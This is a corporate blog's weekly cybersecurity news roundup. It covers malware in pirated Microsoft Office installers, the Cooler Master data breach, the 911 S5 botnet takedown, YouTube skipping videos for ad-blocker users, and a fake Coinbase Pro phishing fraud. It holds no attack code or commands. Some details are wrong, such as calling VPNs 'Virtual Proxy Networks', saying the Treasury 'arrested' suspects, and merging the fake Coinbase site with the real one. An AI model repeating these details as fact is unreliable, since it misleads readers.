---
title: "Microsoft Office Malware, Cooler Master Breach, 911 Botnet Dismantled, Cybersecurity News [May 27, 2024] | DuoCircle"
description: "Microsoft Office Malware, Cooler Master Breach, 911 Botnet Dismantled, Cybersecurity News [May 27."
image: "https://www.duocircle.com/images/og-default.png"
canonical: "https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-23-of-2024/"
---

Quick Answer

Five stories this week. Pirated Microsoft Office installers on torrent sites are bundling a mix of malware, including remote access trojans, cryptocurrency miners, and adware loaders. PC component maker Cooler Master confirmed a breach exposing customer records. The U.S. Department of Justice dismantled the 911 S5 botnet, which had infected 19 million IPs across 190+ countries, and arrested its administrator Yunhe Wang. YouTube users running ad blockers reported videos skipping to the end, an apparent escalation in Google's anti-ad-blocker enforcement. And Indian national Chirag Tomar was extradited and pled guilty to defrauding $37 million in cryptocurrency through a fake Coinbase Pro site.

Microsoft Office Malware, Cooler Master Breach, 911 Botnet Dismantled, Cybersecurity News \[May 27, 2024\]

Your browser does not support the audio element.

[ Download episode](https://media.mailhop.org/duocircle/images/2024/06/Microsoft-Office-Malware-Cooler-Master-Breach-911-Botnet-Dismantled-Cybersecurity-News-May-27-2024.mp3) 

Share 

[ ](https://www.linkedin.com/sharing/share-offsite/?url=undefined%2Fblog%2Fannouncements%2Fcyber-security-news-update-week-23-of-2024%2F "Share on LinkedIn") [ ](https://twitter.com/intent/tweet?text=Microsoft%20Office%20Malware%2C%20Cooler%20Master%20Breach%2C%20911%20Botnet%20Dismantled%2C%20Cybersecurity%20News%20%5BMay%2027%2C%202024%5D&url=undefined%2Fblog%2Fannouncements%2Fcyber-security-news-update-week-23-of-2024%2F "Share on X/Twitter") [ ](https://www.facebook.com/sharer/sharer.php?u=undefined%2Fblog%2Fannouncements%2Fcyber-security-news-update-week-23-of-2024%2F "Share on Facebook") [ ](https://reddit.com/submit?url=undefined%2Fblog%2Fannouncements%2Fcyber-security-news-update-week-23-of-2024%2F&title=Microsoft%20Office%20Malware%2C%20Cooler%20Master%20Breach%2C%20911%20Botnet%20Dismantled%2C%20Cybersecurity%20News%20%5BMay%2027%2C%202024%5D "Share on Reddit") [ ](mailto:?subject=Microsoft%20Office%20Malware%2C%20Cooler%20Master%20Breach%2C%20911%20Botnet%20Dismantled%2C%20Cybersecurity%20News%20%5BMay%2027%2C%202024%5D&body=Check out this article: undefined%2Fblog%2Fannouncements%2Fcyber-security-news-update-week-23-of-2024%2F "Share via Email") 

![cyber security](https://media.mailhop.org/duocircle/images/2024/06/email-migration-service-2.jpg) 

Here we are back again with the latest [cybersecurity](/) news around the world covering the malware **posing as Microsoft Office** on torrent websites, the Cooler Master data breach, the takedown of 911 S5 botnet, YouTube causing trouble for ad blockers, and the arrest of an Indian man for creating a fake Coinbase website and stealing crypto. Stay tuned!

## Unauthorized Microsoft Office Installs Bring a Mix of Malware to Systems

Threat actors have been distributing [malware](/data-privacy/new-zero-click-hack-with-stealthy-root-privilege-malware-targets-ios-users/) via pirated versions of Microsoft Office on **torrent websites**.

_The malware is **extremely capable** and contains RATs (Remote Access Trojans), crypto miners, proxy tools, and much more_. They were first noticed by AhnLab’s Security Intelligence Center, which [shared details](https://asec.ahnlab.com/en/66017/) about the threat actors using multiple lures for [Microsoft Office](/email-services/google-workspace-vs-microsoft-office-365-suite-which-is-the-right-choice-for-smes-in-2021/) and Windows OS.

The installer of Microsoft Office has an interface mimicking the original and also lets you select the language and the bit variant of the OS. While the window is open, the **installer launches a .NET malware** that connects to a Telegram channel to receive download URLs (Uniform Resource Locators) pointing to Google Drive or GitHub. From here, the PowerShell introduces [multiple malware strains](https://www.infosecurity-magazine.com/news/malware-service-top-threat/) to the victim’s systems that are **unpacked using 7Zip**.

The **campaign is ongoing** and is known for downloading [Orcus RAT](https://thehackernews.com/2023/01/3-lifehacks-while-analyzing-orcus-rat.html), XMRig, 3Proxy, PureCrypter, and [AntiAV malware](https://gbhackers.com/ra-world-ransomware/). Even if you discover or remove any of these, the updater will redownload it to your system upon launch.

It’s best to **stick to official channels** if you want to download files. But if you do have to install files from different sources, make sure you trust the channel to maintain your [malware protection](/resources/sophos-alternatives) or avoid [pirated software](https://www.pcmag.com/news/new-mac-malware-spreads-through-pirated-software) altogether.

[![Malware Types](https://media.mailhop.org/duocircle/images/2024/06/365-to-365-migration.jpg)](https://media.mailhop.org/duocircle/images/2024/06/365-to-365-migration.jpg)

## Cooler Master Announces Data Breach, Customer Info Compromised

This week, the computer **hardware manufacturing** enterprise Cooler Master confirmed a [data breach](https://www.bbc.com/news/articles/c6ppv06e3n8o) that happened on 19 May 2024.

During the breach, a threat actor known as Ghostr [hacked into the organization’s website](https://techcrunch.com/2022/11/03/hundreds-news-websites-malware/) and made away with **linked databases**. The Cooler Master Fanzone website that was breached is used to register product warranties and open support tickets, and it needs the personal information of the customers.

The [threat actor](https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/) says that they were able to steal 103GB of data, including information of nearly half a million customers. The potential **information that is at risk** includes names, emails, residential addresses, birth dates, and phone numbers of the customers. There are also other samples that include information about products, employees, emails with vendors, and partial **credit card data**.

The organization says they **promptly alerted** the authorities and has also hired security experts to address the situation. If you are an affected customer, Cooler Master will send you an email and [advise you](https://www.bleepingcomputer.com/news/security/cooler-master-confirms-customer-info-stolen-in-data-breach/) about the next steps you have to take to make sure that your data is safe.

The size of the data sample is substantial, so there’s a high chance that it **could be sold to other threat actors** in [dark web marketplaces](https://thehackernews.com/2023/06/over-100000-stolen-chatgpt-account.html). If you are a Cooler Master user, it’s best to keep an eye out for [phishing emails](https://www.cbsnews.com/news/russian-hackers-u-s-intelligence-community-spear-phishing-campaign/) and other [social engineering](/phishing-protection/social-engineering-is-a-growing-threat/) attacks.

## US Takes Down 911 S5 Botnet Used for Cyberattacks, Arrests Organizer

The U.S. Justice Department [took down and dismantled](https://www.scmagazine.com/news/feds-remove-ubiquiti-router-botnet-used-by-russian-intelligence) the 911 S5 proxy botnet with the help of international partners and has **arrested the portal’s administrator**.

_The FBI conducted a **joint cyber operation** to dismantle the world’s largest botnet ever and arrested its administrator, a Chinese national, Yunhe Wang._ They seized infrastructure and assets and levied sanctions. Wang and his conspirators have been pushing malware using multiple [malicious VPNs](https://thehackernews.com/2024/01/chinese-hackers-exploiting-critical-vpn.html) (Virtual Proxy Networks) **since 2011** and added all compromised devices to the 911 S5 residential proxy.

You can check if you are a victim of the malware [here and](https://www.fbi.gov/investigate/cyber/how-to-identify-and-remove-vpn-applications-that-contain-911-s5-backdoors) take the steps to get rid of it. Between 2014 and 2022, the threat actor created a **network of 19 million** unique IP addresses worldwide. The threat actors lured potential victims by offering free VPN services to install the [proxy malware](https://www.geeksforgeeks.org/what-is-proxy-trojan/).

Now that it is finally dismantled, the Justice Department is serving **seizure warrants** for multiple domains that were used by the threat actor-network. Wang made a profit of $99 million by selling access to IP addresses to threat actors who [misused the networks for malicious purposes](https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/).

The U.S. Treasury Department arrested Wang (the boss), Jingping Liu (the money launderer), and Yanni Zheng (who had the power of attorney for Yunhe Wang), along with three organizations that were owned by Wang. He faces a maximum penalty of up to **65 years in prison** if convicted on all accounts.

## Ad Blocker Users Report YouTube Videos Skipping to the End

Many people from **around the world** have been reporting that the YouTube videos they play using an [ad blocker](https://www.theverge.com/2024/4/15/24131338/youtube-ad-blocker-crackdown-mobile-apps) skip to the end directly.

The issue began this week and is not impacting everyone at the moment, but it does affect all YT videos. _The behavior is persistent even if you try to reload the same video or click on the beginning of the video to watch it again_. You can only **fix this by getting rid of the ad blocker**.

The issue was [first reported](https://9to5google.com/2024/05/28/youtube-skipping-to-end-adblockers/) by **9to5Google**, and as it came to Google’s attention, they started cracking down on the use of ad blockers on YouTube. They have still not made it clear if the issue is an **intentional move** by them or an issue with third-party ad blocker applications. _However, YouTube recently announced that using ad blockers violates its terms of service, and it will soon start taking action against this._

People have found ways to fix it though! Some folks switched their ad blocker to one called [uBlock Origin](https://en.wikipedia.org/wiki/UBlock%5FOrigin), while others tried watching in **incognito mode** or signing out of YouTube. There’s also a web browser called [Brave](https://brave.com/) that seems to block ads without causing the videos to skip.

[![phishing protection](https://media.mailhop.org/duocircle/images/2024/06/email-smtp-service-6128.jpg)](https://media.mailhop.org/duocircle/images/2024/06/email-smtp-service-6128.jpg)

## Indian Man Defrauds $37 Million in Crypto Through Counterfeit Coinbase Pro Site

In other news, an Indian national pleaded guilty to a [wire fraud](https://www.cbsnews.com/colorado/news/former-colorado-data-company-executive-convicted-mail-wire-fraud/) conspiracy where he stole nearly $37 million via a fake Coinbase website that stole login credentials. This case **highlights the importance** of [phishing protection](/email/phishing-protection) to prevent such scams.

The Indian, Chirag Tomar, was [arrested at](https://www.justice.gov/usao-wdnc/pr/indian-national-pleads-guilty-wire-fraud-conspiracy-stealing-over-37-million-spoofing) the Atlanta airport in December last year and **was under investigation** by the U.S. Secret Service and the FBI. Tomar and his accomplices made a fake Coinbase website that mimicked the Coinbase Pro portal in 2021 using the domain “Coinbasepro\[.\]com“.

The site tricked the customers of the official portal into entering their login details and **2FA codes**. It was eventually shut down in November 2022, and all of its functionality was then integrated into the official Coinbase platform. Tomar also made [phishing Coinbase accounts](https://thehackernews.com/2024/01/inferno-malware-masqueraded-as-coinbase.html), **took control of crypto wallets**, and transferred funds into wallets that were under his control.

He also used social engineering tactics and leveraged a [fake login error](https://cybernews.com/security/facebook-users-targeted-copyright-infringement-scam/) that encouraged the users to call Coinbase representatives, who were also fake and duped the victims into **installing RATs** on their devices. The fraudster could go to prison for up to 20 years and be fined $250,000.

## Topics

NewsSecurityUpdates 

![Brad Slavin](https://media.mailhop.org/dmarcreport/images/team/brad-slavin.jpg) 

Brad Slavin 

General Manager

General Manager at DuoCircle. Product strategy and commercial lead across the email security portfolio.

## Secure your email infrastructure

Protect, authenticate, and deliver. Contact our team to find the right solution.

[Contact Sales](/contact/) [Explore Products](/products/) 

## Related Articles

[  News 3m  Alert: Fix SPF & DKIM Settings For Your Email Forwarding Set Up Through Microsoft o365 SMTP Server Or Your Emails May End Up In Spam  Jul 20, 2021 ](/blog/announcements/alert-fix-spf-dkim-settings-for-your-email-forwarding-set-up-through-microsoft-o365-smtp-server-or-your-emails-may-end-up-in-spam/)[  News 6m  Cyber Security News Update, Week 1 of 2022  Jan 7, 2022 ](/blog/announcements/cyber-security-news-update-week-1-of-2022/)[  News 7m  Cybersecurity News Update, Week 1 of 2023  Jan 1, 2023 ](/blog/announcements/cyber-security-news-update-week-1-of-2023/)[  News 5m  EasyPark Data Breach, Ohio Lottery Cyberattack, GTA 5 Leak, Cybersecurity News \[December 25, 2023\]  Jan 4, 2024 ](/blog/announcements/cyber-security-news-update-week-1-of-2024/)

```json
{"@context":"https://schema.org","@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com","logo":{"@type":"ImageObject","url":"https://www.duocircle.com/images/duocircle-logo.png"},"description":"DuoCircle is a portfolio of specialized email products covering protection, authentication, delivery, and routing. We deliver about 90% of category-leader capability at roughly half the price, backed by experts who own the outcome. Trusted by 50,000+ organizations since 2014.","subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}],"sameAs":["https://www.linkedin.com/company/duocircle","https://x.com/duocirclellc","https://www.facebook.com/duocirclellc","https://www.g2.com/products/phish-protection-by-duocircle/reviews","https://github.com/duocircle","https://www.crunchbase.com/organization/duocircle-llc"],"contactPoint":{"@type":"ContactPoint","contactType":"customer support","url":"https://support.duocircle.com"},"knowsAbout":["Email Security","Email Authentication","SPF","DKIM","DMARC","Phishing Protection","Spam Filtering","SMTP Relay","Email Deliverability","Email Forwarding"]}
```

```json
{"@context":"https://schema.org","@type":"WebSite","name":"DuoCircle LLC","url":"https://www.duocircle.com","description":"DuoCircle is a portfolio of specialized email products covering protection, authentication, delivery, and routing. We deliver about 90% of category-leader capability at roughly half the price, backed by experts who own the outcome. Trusted by 50,000+ organizations since 2014.","publisher":{"@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com","logo":{"@type":"ImageObject","url":"https://www.duocircle.com/images/duocircle-logo.png"},"description":"DuoCircle is a portfolio of specialized email products covering protection, authentication, delivery, and routing. We deliver about 90% of category-leader capability at roughly half the price, backed by experts who own the outcome. Trusted by 50,000+ organizations since 2014.","subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]}}
```

```json
[{"@context":"https://schema.org","@type":"BlogPosting","headline":"Microsoft Office Malware, Cooler Master Breach, 911 Botnet Dismantled, Cybersecurity News [May 27, 2024]","description":"Microsoft Office Malware, Cooler Master Breach, 911 Botnet Dismantled, Cybersecurity News [May 27.","url":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-23-of-2024/","datePublished":"2024-06-03T17:12:29.000Z","dateModified":"2025-08-26T12:36:43.000Z","dateCreated":"2024-06-03T17:12:29.000Z","author":{"@type":"Person","@id":"https://www.duocircle.com/authors/brad-slavin/#person","name":"Brad Slavin","url":"https://www.duocircle.com/authors/brad-slavin/","jobTitle":"General Manager","description":"Brad Slavin runs DuoCircle, the company behind DMARC Report, AutoSPF, Phish Protection, and Mailhop. His focus is product strategy, customer relationships, and the commercial and compliance side of email authentication (DPAs, SLAs, enterprise procurement).","image":"https://media.mailhop.org/dmarcreport/images/team/brad-slavin.jpg","knowsAbout":["Email Security Strategy","SaaS Product Management","Enterprise Compliance","Customer Success","Email Deliverability Business"],"worksFor":{"@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com"},"sameAs":["https://www.linkedin.com/in/bradslavin"]},"publisher":{"@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com","logo":{"@type":"ImageObject","url":"https://www.duocircle.com/images/duocircle-logo.png"},"description":"DuoCircle is a portfolio of specialized email products covering protection, authentication, delivery, and routing. We deliver about 90% of category-leader capability at roughly half the price, backed by experts who own the outcome. Trusted by 50,000+ organizations since 2014.","subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]},"mainEntityOfPage":{"@type":"WebPage","@id":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-23-of-2024/"},"articleSection":"announcements","keywords":"News, Security, Updates","wordCount":1189,"image":{"@type":"ImageObject","url":"https://media.mailhop.org/duocircle/images/2024/06/email-migration-service-2.jpg","caption":"cyber security","width":900,"height":600},"speakable":{"@type":"SpeakableSpecification","cssSelector":[".answer-block","h1"]}},{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https://www.duocircle.com/blog/"},{"@type":"ListItem","position":2,"name":"News"},{"@type":"ListItem","position":3,"name":"Microsoft Office Malware, Cooler Master Breach, 911 Botnet Dismantled, Cybersecurity News [May 27, 2024]","item":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-23-of-2024/"}]}]
```

```json
{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.duocircle.com/"},{"@type":"ListItem","position":2,"name":"Blog","item":"https://www.duocircle.com/blog/"},{"@type":"ListItem","position":3,"name":"News","item":"https://www.duocircle.comundefined"},{"@type":"ListItem","position":4,"name":"Microsoft Office Malware, Cooler Master Breach, 911 Botnet Dismantled, Cybersecurity News [May 27, 2024]","item":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-23-of-2024/"}]}
```

```json
{"@context":"https://schema.org","@type":"BlogPosting","headline":"Microsoft Office Malware, Cooler Master Breach, 911 Botnet Dismantled, Cybersecurity News [May 27, 2024]","description":"Microsoft Office Malware, Cooler Master Breach, 911 Botnet Dismantled, Cybersecurity News [May 27.","url":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-23-of-2024/","datePublished":"2024-06-03T17:12:29.000Z","dateModified":"2025-08-26T12:36:43.000Z","dateCreated":"2024-06-03T17:12:29.000Z","author":{"@type":"Person","@id":"https://www.duocircle.com/authors/brad-slavin/#person","name":"Brad Slavin","url":"https://www.duocircle.com/authors/brad-slavin/","jobTitle":"General Manager","description":"Brad Slavin runs DuoCircle, the company behind DMARC Report, AutoSPF, Phish Protection, and Mailhop. His focus is product strategy, customer relationships, and the commercial and compliance side of email authentication (DPAs, SLAs, enterprise procurement).","image":"https://media.mailhop.org/dmarcreport/images/team/brad-slavin.jpg","knowsAbout":["Email Security Strategy","SaaS Product Management","Enterprise Compliance","Customer Success","Email Deliverability Business"],"worksFor":{"@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com"},"sameAs":["https://www.linkedin.com/in/bradslavin"]},"publisher":{"@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com","logo":{"@type":"ImageObject","url":"https://www.duocircle.com/images/duocircle-logo.png"},"description":"DuoCircle is a portfolio of specialized email products covering protection, authentication, delivery, and routing. We deliver about 90% of category-leader capability at roughly half the price, backed by experts who own the outcome. Trusted by 50,000+ organizations since 2014.","subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]},"mainEntityOfPage":{"@type":"WebPage","@id":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-23-of-2024/"},"articleSection":"announcements","keywords":"News, Security, Updates","wordCount":1189,"image":{"@type":"ImageObject","url":"https://media.mailhop.org/duocircle/images/2024/06/email-migration-service-2.jpg","caption":"cyber security","width":900,"height":600},"speakable":{"@type":"SpeakableSpecification","cssSelector":[".answer-block","h1"]}}
```